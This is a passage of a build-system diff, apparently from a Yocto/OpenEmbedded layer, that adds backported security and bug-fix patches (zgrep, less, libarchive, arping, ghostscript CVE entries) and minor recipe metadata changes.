20UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)\.tar" 20UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)\.tar"
21 21
22# The jpeg issue in the CVE is present in the gs jpeg sources
23# however we use an external jpeg which doesn't have the issue.
24CVE_CHECK_WHITELIST += "CVE-2013-6629"
25
22def gs_verdir(v): 26def gs_verdir(v):
23 return "".join(v.split(".")) 27 return "".join(v.split("."))
24 28
@@ -29,12 +33,24 @@ SRC_URI_BASE = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/d
29 file://do-not-check-local-libpng-source.patch \ 33 file://do-not-check-local-libpng-source.patch \
30 file://avoid-host-contamination.patch \ 34 file://avoid-host-contamination.patch \
31 file://mkdir-p.patch \ 35 file://mkdir-p.patch \
36 file://CVE-2020-15900.patch \
37 file://check-stack-limits-after-function-evalution.patch \
38 file://CVE-2021-45949.patch \
39 file://CVE-2021-3781_1.patch \
40 file://CVE-2021-3781_2.patch \
41 file://CVE-2021-3781_3.patch \
42 file://CVE-2023-28879.patch \
43 file://0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch \
44 file://CVE-2023-36664-pre1.patch \
45 file://CVE-2023-36664-1.patch \
46 file://CVE-2023-36664-2.patch \
47 file://CVE-2023-43115.patch \
48 file://CVE-2020-36773.patch \
32" 49"
33 50
34SRC_URI = "${SRC_URI_BASE} \ 51SRC_URI = "${SRC_URI_BASE} \
35 file://ghostscript-9.21-prevent_recompiling.patch \ 52 file://ghostscript-9.21-prevent_recompiling.patch \
36 file://cups-no-gcrypt.patch \ 53 file://cups-no-gcrypt.patch \
37 file://CVE-2020-15900.patch \
38 " 54 "
39 55
40SRC_URI_class-native = "${SRC_URI_BASE} \ 56SRC_URI_class-native = "${SRC_URI_BASE} \
diff --git a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
index ab70ea98a3..7d0f74186e 100644
--- a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
+++ b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "https://golang.org/"
5LICENSE = "MIT" 5LICENSE = "MIT"
6LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302" 6LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302"
7 7
8SRC_URI = "git://${GO_IMPORT}" 8SRC_URI = "git://${GO_IMPORT};branch=master"
9SRCREV = "46695d81d1fae905a270fb7db8a4d11a334562fe" 9SRCREV = "46695d81d1fae905a270fb7db8a4d11a334562fe"
10UPSTREAM_CHECK_COMMITS = "1" 10UPSTREAM_CHECK_COMMITS = "1"
11 11
diff --git a/meta/recipes-extended/grep/grep_3.4.bb b/meta/recipes-extended/grep/grep_3.4.bb
index e176dd727b..46ac4cfb00 100644
--- a/meta/recipes-extended/grep/grep_3.4.bb
+++ b/meta/recipes-extended/grep/grep_3.4.bb
@@ -1,5 +1,6 @@
1SUMMARY = "GNU grep utility" 1SUMMARY = "GNU grep utility"
2HOMEPAGE = "http://savannah.gnu.org/projects/grep/" 2HOMEPAGE = "http://savannah.gnu.org/projects/grep/"
3DESCRIPTION = "Grep searches one or more input files for lines containing a match to a specified pattern. By default, grep prints the matching lines."
3BUGTRACKER = "http://savannah.gnu.org/bugs/?group=grep" 4BUGTRACKER = "http://savannah.gnu.org/bugs/?group=grep"
4SECTION = "console/utils" 5SECTION = "console/utils"
5LICENSE = "GPLv3" 6LICENSE = "GPLv3"
diff --git a/meta/recipes-extended/groff/groff_1.22.4.bb b/meta/recipes-extended/groff/groff_1.22.4.bb
index 7bb393e09c..f0e9eb6a8a 100644
--- a/meta/recipes-extended/groff/groff_1.22.4.bb
+++ b/meta/recipes-extended/groff/groff_1.22.4.bb
@@ -20,7 +20,6 @@ SRC_URI[sha256sum] = "e78e7b4cb7dec310849004fa88847c44701e8d133b5d4c13057d876c1b
20 20
21# Remove at the next upgrade 21# Remove at the next upgrade
22PR = "r1" 22PR = "r1"
23HASHEQUIV_HASH_VERSION .= ".1"
24 23
25DEPENDS = "bison-native" 24DEPENDS = "bison-native"
26RDEPENDS_${PN} += "perl sed" 25RDEPENDS_${PN} += "perl sed"
@@ -63,6 +62,10 @@ do_install_append() {
63 rm -rf ${D}${bindir}/glilypond 62 rm -rf ${D}${bindir}/glilypond
64 rm -rf ${D}${libdir}/groff/glilypond 63 rm -rf ${D}${libdir}/groff/glilypond
65 rm -rf ${D}${mandir}/man1/glilypond* 64 rm -rf ${D}${mandir}/man1/glilypond*
65
66 # not ship /usr/bin/grap2graph and its releated man files
67 rm -rf ${D}${bindir}/grap2graph
68 rm -rf ${D}${mandir}/man1/grap2graph*
66} 69}
67 70
68do_install_append_class-native() { 71do_install_append_class-native() {
diff --git a/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch b/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch
new file mode 100644
index 0000000000..046c95df47
--- /dev/null
+++ b/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch
@@ -0,0 +1,45 @@
1From 7073a366ee71639a1902eefb7500e14acb920f64 Mon Sep 17 00:00:00 2001
2From: Lasse Collin <lasse.collin@tukaani.org>
3Date: Mon, 4 Apr 2022 23:52:49 -0700
4Subject: [PATCH] zgrep: avoid exploit via multi-newline file names
5
6* zgrep.in: The issue with the old code is that with multiple
7newlines, the N-command will read the second line of input,
8then the s-commands will be skipped because it's not the end
9of the file yet, then a new sed cycle starts and the pattern
10space is printed and emptied. So only the last line or two get
11escaped. This patch makes sed read all lines into the pattern
12space and then do the escaping.
13
14This vulnerability was discovered by:
15cleemy desu wayo working with Trend Micro Zero Day Initiative
16
17Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/gzip.git/commit/?id=dc9740df61e575e8c3148b7bd3c147a81ea00c7c]
18CVE: CVE-2022-1271
19
20Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
21---
22 zgrep.in | 10 +++++++---
23 1 file changed, 7 insertions(+), 3 deletions(-)
24
25diff --git a/zgrep.in b/zgrep.in
26index 3efdb52..d391291 100644
27--- a/zgrep.in
28+++ b/zgrep.in
29@@ -222,9 +222,13 @@ do
30 '* | *'&'* | *'\'* | *'|'*)
31 i=$(printf '%s\n' "$i" |
32 sed '
33- $!N
34- $s/[&\|]/\\&/g
35- $s/\n/\\n/g
36+ :start
37+ $!{
38+ N
39+ b start
40+ }
41+ s/[&\|]/\\&/g
42+ s/\n/\\n/g
43 ');;
44 esac
45 sed_script="s|^|$i:|"
diff --git a/meta/recipes-extended/gzip/gzip_1.10.bb b/meta/recipes-extended/gzip/gzip_1.10.bb
index 9778e687e1..c558c21f10 100644
--- a/meta/recipes-extended/gzip/gzip_1.10.bb
+++ b/meta/recipes-extended/gzip/gzip_1.10.bb
@@ -4,6 +4,7 @@ LICENSE = "GPLv3+"
4 4
5SRC_URI = "${GNU_MIRROR}/gzip/${BP}.tar.gz \ 5SRC_URI = "${GNU_MIRROR}/gzip/${BP}.tar.gz \
6 file://run-ptest \ 6 file://run-ptest \
7 file://CVE-2022-1271.patch \
7 " 8 "
8SRC_URI_append_class-target = " file://wrong-path-fix.patch" 9SRC_URI_append_class-target = " file://wrong-path-fix.patch"
9 10
diff --git a/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch b/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch
new file mode 100644
index 0000000000..bf86115843
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch
@@ -0,0 +1,79 @@
1From 86ed08936d49e2c81ef49dfbd02aca1c74d0c098 Mon Sep 17 00:00:00 2001
2From: lac-0073 <61903197+lac-0073@users.noreply.github.com>
3Date: Mon, 26 Oct 2020 09:45:42 +0800
4Subject: [PATCH] arpping: make update neighbours work again
5
6The arping is using inconsistent sender_ip_addr and target_ip_addr in
7messages. This causes the client receiving the arp message not to update
8the arp table entries.
9
10The specific performance is as follows:
11
12There is a machine 2 with IP 10.20.30.3 configured on eth0:0 that is in the
13same IP subnet as eth0. This IP was originally used on another machine 1,
14and th IP needs to be changed back to the machine 1. When using the arping
15command to announce what ethernet address has IP 10.20.30.3, the arp table
16on machine 3 is not updated.
17
18Machine 3 original arp table:
19
20 10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02
21 10.20.30.2 machine 2 eth0 00:00:00:00:00:02
22 10.20.30.1 machine 1 eth0 00:00:00:00:00:01
23
24Create interface eth0:0 on machine 1, and use the arping command to send arp
25packets. Expected outcome on machine 3:
26
27 10.20.30.3 machine 1 eth0:0 00:00:00:00:00:01
28 10.20.30.2 machine 2 eth0 00:00:00:00:00:02
29 10.20.30.1 machine 1 eth0 00:00:00:00:00:01
30
31Actual results on machine 3:
32
33 10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02
34 10.20.30.2 machine 2 eth0 00:00:00:00:00:02
35 10.20.30.1 machine 1 eth0 00:00:00:00:00:01
36
37Fixes: https://github.com/iputils/iputils/issues/298
38Fixes: 68f12fc4a0dbef4ae4c404da24040d22c5a14339
39Signed-off-by: Aichun Li <liaichun@huawei.com>
40Upstream-Status: Backport [https://github.com/iputils/iputils/commit/86ed08936d49e2c81ef49dfbd02aca1c74d0c098]
41Signed-off-by: Visa Hankala <visa@hankala.org>
42---
43 arping.c | 16 +++++++++-------
44 1 file changed, 9 insertions(+), 7 deletions(-)
45
46diff --git a/arping.c b/arping.c
47index a002786..53fdbb4 100644
48--- a/arping.c
49+++ b/arping.c
50@@ -968,7 +968,7 @@ int main(int argc, char **argv)
51 }
52 memset(&saddr, 0, sizeof(saddr));
53 saddr.sin_family = AF_INET;
54- if (!ctl.unsolicited && (ctl.source || ctl.gsrc.s_addr)) {
55+ if (ctl.source || ctl.gsrc.s_addr) {
56 saddr.sin_addr = ctl.gsrc;
57 if (bind(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
58 error(2, errno, "bind");
59@@ -979,12 +979,14 @@ int main(int argc, char **argv)
60 saddr.sin_port = htons(1025);
61 saddr.sin_addr = ctl.gdst;
62
63- if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1)
64- error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)"));
65- if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
66- error(2, errno, "connect");
67- if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1)
68- error(2, errno, "getsockname");
69+ if (!ctl.unsolicited) {
70+ if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1)
71+ error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)"));
72+ if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
73+ error(2, errno, "connect");
74+ if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1)
75+ error(2, errno, "getsockname");
76+ }
77 ctl.gsrc = saddr.sin_addr;
78 }
79 close(probe_fd);
diff --git a/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch b/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch
new file mode 100644
index 0000000000..8495178879
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch
@@ -0,0 +1,39 @@
1From 18f14be80466ddc8fb17a400be82764a779c8dcd Mon Sep 17 00:00:00 2001
2From: Sami Kerola <kerolasa@iki.fi>
3Date: Wed, 31 Jul 2019 21:28:12 +0100
4Subject: [PATCH] arping: revert partially - fix sent vs received packages
5 return value
6
7Commit 84ca65ca980315c73f929fed8b6f16bbd698c3a0 caused regression. The
8arping -D needs return value evaluation that was the earlier default, in
9other cases the new return value should be correct.
10
11Addresses: https://github.com/iputils/iputils/issues/209
12See-also: https://github.com/void-linux/void-packages/issues/13304
13Signed-off-by: Sami Kerola <kerolasa@iki.fi>
14Upstream-Status: Backport [https://github.com/iputils/iputils/commit/18f14be80466ddc8fb17a400be82764a779c8dcd]
15Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
16---
17 arping.c | 6 +++++-
18 1 file changed, 5 insertions(+), 1 deletion(-)
19
20diff --git a/arping.c b/arping.c
21index 77c9c56..2c87c15 100644
22--- a/arping.c
23+++ b/arping.c
24@@ -792,7 +792,11 @@ static int event_loop(struct run_state *ctl)
25 close(tfd);
26 freeifaddrs(ctl->ifa0);
27 rc |= finish(ctl);
28- rc |= (ctl->sent != ctl->received);
29+ if (ctl->dad && ctl->quit_on_reply)
30+ /* Duplicate address detection mode return value */
31+ rc |= !(ctl->brd_sent != ctl->received);
32+ else
33+ rc |= (ctl->sent != ctl->received);
34 return rc;
35 }
36
37--
382.18.4
39
diff --git a/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch b/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch
new file mode 100644
index 0000000000..a5f40860dc
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch
@@ -0,0 +1,39 @@
1From 1df5350bdc952b14901fde356b17b78c2bcd4cff Mon Sep 17 00:00:00 2001
2From: Sami Kerola <kerolasa@iki.fi>
3Date: Wed, 28 Aug 2019 20:05:22 +0100
4Subject: [PATCH] arping: fix -f quit on first reply regression
5
6When arping runs together with -f 'quit on first reply' and -w <timeout>
7'how long to wait for a reply' the command needs to exit if replies are not
8received after wait period. Notice that the exit in case of lost packages
9will be 1 signifying failure. Getting a reply results to 0 exit value.
10
11Addresses: https://bugs.debian.org/935946
12Reported-by: Lucas Nussbaum <lucas@debian.org>
13Addresses: https://github.com/iputils/iputils/issues/211
14Reported-by: Noah Meyerhans <noahm@debian.org>
15Broken-since: 67e070d08dcbec990e1178360f82b3e2ca4f6d5f
16Signed-off-by: Sami Kerola <kerolasa@iki.fi>
17Upstream-Status: Backport [https://github.com/iputils/iputils/commit/1df5350bdc952b14901fde356b17b78c2bcd4cff]
18Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
19---
20 arping.c | 3 ++-
21 1 file changed, 2 insertions(+), 1 deletion(-)
22
23diff --git a/arping.c b/arping.c
24index 2c87c15..30884f6 100644
25--- a/arping.c
26+++ b/arping.c
27@@ -764,7 +764,8 @@ static int event_loop(struct run_state *ctl)
28 continue;
29 }
30 total_expires += exp;
31- if (0 < ctl->count && (uint64_t)ctl->count < total_expires) {
32+ if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) ||
33+ (ctl->quit_on_reply && ctl->timeout < total_expires)) {
34 exit_loop = 1;
35 continue;
36 }
37--
382.18.4
39
diff --git a/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch b/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch
new file mode 100644
index 0000000000..ebd122c157
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch
@@ -0,0 +1,37 @@
1From ec821e572a640bd79aecc3922cb9001f4b6b26f2 Mon Sep 17 00:00:00 2001
2From: Petr Vorel <petr.vorel@gmail.com>
3Date: Sat, 7 Sep 2019 06:07:19 +0200
4Subject: [PATCH] arping: Fix comparison of different signedness warning
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9../arping.c:768:45: warning: comparison of integer expressions of different signedness: ‘int’ and ‘uint64_t’ {aka ‘long unsigned int’} [-Wsign-compare]
10 768 | (ctl->quit_on_reply && ctl->timeout < total_expires)) {
11
12Fixes: 1df5350 ("arping: fix -f quit on first reply regression")
13Reference: https://github.com/iputils/iputils/pull/212
14Acked-by: Sami Kerola <kerolasa@iki.fi>
15Signed-off-by: Petr Vorel <petr.vorel@gmail.com>
16Upstream-Status: Backport [https://github.com/iputils/iputils/commit/ec821e572a640bd79aecc3922cb9001f4b6b26f2]
17Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
18---
19 arping.c | 2 +-
20 1 file changed, 1 insertion(+), 1 deletion(-)
21
22diff --git a/arping.c b/arping.c
23index 2d05728..88319cd 100644
24--- a/arping.c
25+++ b/arping.c
26@@ -765,7 +765,7 @@ static int event_loop(struct run_state *ctl)
27 }
28 total_expires += exp;
29 if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) ||
30- (ctl->quit_on_reply && ctl->timeout < total_expires)) {
31+ (ctl->quit_on_reply && ctl->timeout < (long)total_expires)) {
32 exit_loop = 1;
33 continue;
34 }
35--
362.18.4
37
diff --git a/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch b/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch
new file mode 100644
index 0000000000..923e06e30b
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch
@@ -0,0 +1,45 @@
1From 68f12fc4a0dbef4ae4c404da24040d22c5a14339 Mon Sep 17 00:00:00 2001
2From: Sami Kerola <kerolasa@iki.fi>
3Date: Sat, 8 Feb 2020 14:12:18 +0000
4Subject: [PATCH] arping: return success when unsolicited ARP mode destination
5 does not answer
6
7Manual page is making promise answers are not expected when -U (or -A)
8option is in use. Either I am looking wrong or this has been broken since
9at the beginning of git history.
10
11Addresses: https://github.com/iputils/iputils/issues/247
12Signed-off-by: Sami Kerola <kerolasa@iki.fi>
13Upstream-Status: Backport [https://github.com/iputils/iputils/commit/68f12fc4a0dbef4ae4c404da24040d22c5a14339]
14Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
15---
16 arping.c | 6 ++++--
17 1 file changed, 4 insertions(+), 2 deletions(-)
18
19diff --git a/arping.c b/arping.c
20index 996cf2b..5180ae0 100644
21--- a/arping.c
22+++ b/arping.c
23@@ -794,7 +794,9 @@ static int event_loop(struct run_state *ctl)
24 close(tfd);
25 freeifaddrs(ctl->ifa0);
26 rc |= finish(ctl);
27- if (ctl->dad && ctl->quit_on_reply)
28+ if (ctl->unsolicited)
29+ /* nothing */;
30+ else if (ctl->dad && ctl->quit_on_reply)
31 /* Duplicate address detection mode return value */
32 rc |= !(ctl->brd_sent != ctl->received);
33 else
34@@ -943,7 +945,7 @@ int main(int argc, char **argv)
35 }
36 memset(&saddr, 0, sizeof(saddr));
37 saddr.sin_family = AF_INET;
38- if (ctl.source || ctl.gsrc.s_addr) {
39+ if (!ctl.unsolicited && (ctl.source || ctl.gsrc.s_addr)) {
40 saddr.sin_addr = ctl.gsrc;
41 if (bind(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
42 error(2, errno, "bind");
43--
442.18.4
45
diff --git a/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch b/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch
new file mode 100644
index 0000000000..3b8a8244da
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch
@@ -0,0 +1,94 @@
1From 60a27c76174c0ae23bdafde2bad4fdd18a44a7ea Mon Sep 17 00:00:00 2001
2From: Sami Kerola <kerolasa@iki.fi>
3Date: Sat, 7 Mar 2020 22:03:21 +0000
4Subject: [PATCH] arping: use additional timerfd to control when timeout
5 happens
6
7Trying to determine timeout by adding up interval values is pointlessly
8complicating. With separate timer everything just works.
9
10Addresses: https://github.com/iputils/iputils/issues/259
11Fixes: 1df5350bdc952b14901fde356b17b78c2bcd4cff
12Signed-off-by: Sami Kerola <kerolasa@iki.fi>
13Upstream-Status: Backport [https://github.com/iputils/iputils/commit/e594ca52afde89746b7d79c875fe9d6aea1850ac]
14Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
15---
16 arping.c | 29 ++++++++++++++++++++++++++---
17 1 file changed, 26 insertions(+), 3 deletions(-)
18
19diff --git a/arping.c b/arping.c
20index 61db3a6..7284351 100644
21--- a/arping.c
22+++ b/arping.c
23@@ -670,6 +670,7 @@ static int event_loop(struct run_state *ctl)
24 enum {
25 POLLFD_SIGNAL = 0,
26 POLLFD_TIMER,
27+ POLLFD_TIMEOUT,
28 POLLFD_SOCKET,
29 POLLFD_COUNT
30 };
31@@ -686,6 +687,13 @@ static int event_loop(struct run_state *ctl)
32 .it_value.tv_sec = ctl->interval,
33 .it_value.tv_nsec = 0
34 };
35+ int timeoutfd;
36+ struct itimerspec timeoutfd_vals = {
37+ .it_interval.tv_sec = ctl->timeout,
38+ .it_interval.tv_nsec = 0,
39+ .it_value.tv_sec = ctl->timeout,
40+ .it_value.tv_nsec = 0
41+ };
42 uint64_t exp, total_expires = 1;
43
44 unsigned char packet[4096];
45@@ -709,7 +717,7 @@ static int event_loop(struct run_state *ctl)
46 pfds[POLLFD_SIGNAL].fd = sfd;
47 pfds[POLLFD_SIGNAL].events = POLLIN | POLLERR | POLLHUP;
48
49- /* timerfd */
50+ /* interval timerfd */
51 tfd = timerfd_create(CLOCK_MONOTONIC, 0);
52 if (tfd == -1) {
53 error(0, errno, "timerfd_create failed");
54@@ -722,6 +730,19 @@ static int event_loop(struct run_state *ctl)
55 pfds[POLLFD_TIMER].fd = tfd;
56 pfds[POLLFD_TIMER].events = POLLIN | POLLERR | POLLHUP;
57
58+ /* timeout timerfd */
59+ timeoutfd = timerfd_create(CLOCK_MONOTONIC, 0);
60+ if (tfd == -1) {
61+ error(0, errno, "timerfd_create failed");
62+ return 1;
63+ }
64+ if (timerfd_settime(timeoutfd, 0, &timeoutfd_vals, NULL)) {
65+ error(0, errno, "timerfd_settime failed");
66+ return 1;
67+ }
68+ pfds[POLLFD_TIMEOUT].fd = timeoutfd;
69+ pfds[POLLFD_TIMEOUT].events = POLLIN | POLLERR | POLLHUP;
70+
71 /* socket */
72 pfds[POLLFD_SOCKET].fd = ctl->socketfd;
73 pfds[POLLFD_SOCKET].events = POLLIN | POLLERR | POLLHUP;
74@@ -764,13 +785,15 @@ static int event_loop(struct run_state *ctl)
75 continue;
76 }
77 total_expires += exp;
78- if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) ||
79- (ctl->quit_on_reply && ctl->timeout < (long)total_expires)) {
80+ if (0 < ctl->count && (uint64_t)ctl->count < total_expires) {
81 exit_loop = 1;
82 continue;
83 }
84 send_pack(ctl);
85 break;
86+ case POLLFD_TIMEOUT:
87+ exit_loop = 1;
88+ break;
89 case POLLFD_SOCKET:
90 if ((s =
91 recvfrom(ctl->socketfd, packet, sizeof(packet), 0,
92--
932.18.4
94
diff --git a/meta/recipes-extended/iputils/iputils_s20190709.bb b/meta/recipes-extended/iputils/iputils_s20190709.bb
index 545f3d5e87..a715d0a37b 100644
--- a/meta/recipes-extended/iputils/iputils_s20190709.bb
+++ b/meta/recipes-extended/iputils/iputils_s20190709.bb
@@ -10,11 +10,17 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=55aa8c9fcad0691cef0ecd420361e390"
10 10
11DEPENDS = "gnutls" 11DEPENDS = "gnutls"
12 12
13SRC_URI = "git://github.com/iputils/iputils \ 13SRC_URI = "git://github.com/iputils/iputils;branch=master;protocol=https \
14 file://0001-ninfod-change-variable-name-to-avoid-colliding-with-.patch \ 14 file://0001-ninfod-change-variable-name-to-avoid-colliding-with-.patch \
15 file://0001-ninfod-fix-systemd-Documentation-url-error.patch \ 15 file://0001-ninfod-fix-systemd-Documentation-url-error.patch \
16 file://0001-rarpd-rdisc-Drop-PrivateUsers.patch \ 16 file://0001-rarpd-rdisc-Drop-PrivateUsers.patch \
17 file://0001-iputils-Initialize-libgcrypt.patch \ 17 file://0001-iputils-Initialize-libgcrypt.patch \
18 file://0001-arping-revert-partially-fix-sent-vs-received-package.patch \
19 file://0002-arping-fix-f-quit-on-first-reply-regression.patch \
20 file://0003-arping-Fix-comparison-of-different-signedness-warnin.patch \
21 file://0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch \
22 file://0005-arping-use-additional-timerfd-to-control-when-timeou.patch \
23 file://0001-arping-make-update-neighbours-work-again.patch \
18 " 24 "
19SRCREV = "13e00847176aa23683d68fce1d17ffb523510946" 25SRCREV = "13e00847176aa23683d68fce1d17ffb523510946"
20 26
diff --git a/meta/recipes-extended/less/less/CVE-2022-48624.patch b/meta/recipes-extended/less/less/CVE-2022-48624.patch
new file mode 100644
index 0000000000..409730bd4f
--- /dev/null
+++ b/meta/recipes-extended/less/less/CVE-2022-48624.patch
@@ -0,0 +1,41 @@
1From c6ac6de49698be84d264a0c4c0c40bb870b10144 Mon Sep 17 00:00:00 2001
2From: Mark Nudelman <markn@greenwoodsoftware.com>
3Date: Sat, 25 Jun 2022 11:54:43 -0700
4Subject: [PATCH] Shell-quote filenames when invoking LESSCLOSE.
5
6Upstream-Status: Backport [https://github.com/gwsw/less/commit/c6ac6de49698be84d264a0c4c0c40bb870b10144]
7CVE: CVE-2022-48624
8Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
9---
10 filename.c | 10 ++++++++--
11 1 file changed, 8 insertions(+), 2 deletions(-)
12
13diff --git a/filename.c b/filename.c
14index 5824e385..dff20c08 100644
15--- a/filename.c
16+++ b/filename.c
17@@ -972,6 +972,8 @@ close_altfile(altfilename, filename)
18 {
19 #if HAVE_POPEN
20 char *lessclose;
21+ char *qfilename;
22+ char *qaltfilename;
23 FILE *fd;
24 char *cmd;
25 int len;
26@@ -986,9 +988,13 @@ close_altfile(altfilename, filename)
27 error("LESSCLOSE ignored; must contain no more than 2 %%s", NULL_PARG);
28 return;
29 }
30- len = (int) (strlen(lessclose) + strlen(filename) + strlen(altfilename) + 2);
31+ qfilename = shell_quote(filename);
32+ qaltfilename = shell_quote(altfilename);
33+ len = (int) (strlen(lessclose) + strlen(qfilename) + strlen(qaltfilename) + 2);
34 cmd = (char *) ecalloc(len, sizeof(char));
35- SNPRINTF2(cmd, len, lessclose, filename, altfilename);
36+ SNPRINTF2(cmd, len, lessclose, qfilename, qaltfilename);
37+ free(qaltfilename);
38+ free(qfilename);
39 fd = shellcmd(cmd);
40 free(cmd);
41 if (fd != NULL)
diff --git a/meta/recipes-extended/less/less_551.bb b/meta/recipes-extended/less/less_551.bb
index a818c68fc7..401f40bed5 100644
--- a/meta/recipes-extended/less/less_551.bb
+++ b/meta/recipes-extended/less/less_551.bb
@@ -26,6 +26,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \
26DEPENDS = "ncurses" 26DEPENDS = "ncurses"
27 27
28SRC_URI = "http://www.greenwoodsoftware.com/${BPN}/${BPN}-${PV}.tar.gz \ 28SRC_URI = "http://www.greenwoodsoftware.com/${BPN}/${BPN}-${PV}.tar.gz \
29 file://CVE-2022-48624.patch \
29 " 30 "
30 31
31SRC_URI[md5sum] = "4ad4408b06d7a6626a055cb453f36819" 32SRC_URI[md5sum] = "4ad4408b06d7a6626a055cb453f36819"
diff --git a/meta/recipes-extended/libaio/libaio_0.3.111.bb b/meta/recipes-extended/libaio/libaio_0.3.111.bb
index 8e1cd349a0..309ae53bfb 100644
--- a/meta/recipes-extended/libaio/libaio_0.3.111.bb
+++ b/meta/recipes-extended/libaio/libaio_0.3.111.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "http://lse.sourceforge.net/io/aio.html"
5LICENSE = "LGPLv2.1+" 5LICENSE = "LGPLv2.1+"
6LIC_FILES_CHKSUM = "file://COPYING;md5=d8045f3b8f929c1cb29a1e3fd737b499" 6LIC_FILES_CHKSUM = "file://COPYING;md5=d8045f3b8f929c1cb29a1e3fd737b499"
7 7
8SRC_URI = "git://pagure.io/libaio.git;protocol=https \ 8SRC_URI = "git://pagure.io/libaio.git;protocol=https;branch=master \
9 file://00_arches.patch \ 9 file://00_arches.patch \
10 file://destdir.patch \ 10 file://destdir.patch \
11 file://libaio_fix_for_mips_syscalls.patch \ 11 file://libaio_fix_for_mips_syscalls.patch \
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch
new file mode 100644
index 0000000000..555c7a47f7
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch
@@ -0,0 +1,183 @@
1Description: Fix handling of symbolic link ACLs
2 Published as CVE-2021-23177
3Origin: upstream, https://github.com/libarchive/libarchive/commit/fba4f123cc456d2b2538f811bb831483bf336bad
4Bug-Debian: https://bugs.debian.org/1001986
5Author: Martin Matuska <martin@matuska.org>
6Last-Updated: 2021-12-20
7
8CVE: CVE-2021-23177
9Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz]
10Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
11
12--- a/libarchive/archive_disk_acl_freebsd.c
13+++ b/libarchive/archive_disk_acl_freebsd.c
14@@ -319,7 +319,7 @@
15
16 static int
17 set_acl(struct archive *a, int fd, const char *name,
18- struct archive_acl *abstract_acl,
19+ struct archive_acl *abstract_acl, __LA_MODE_T mode,
20 int ae_requested_type, const char *tname)
21 {
22 int acl_type = 0;
23@@ -364,6 +364,13 @@
24 return (ARCHIVE_FAILED);
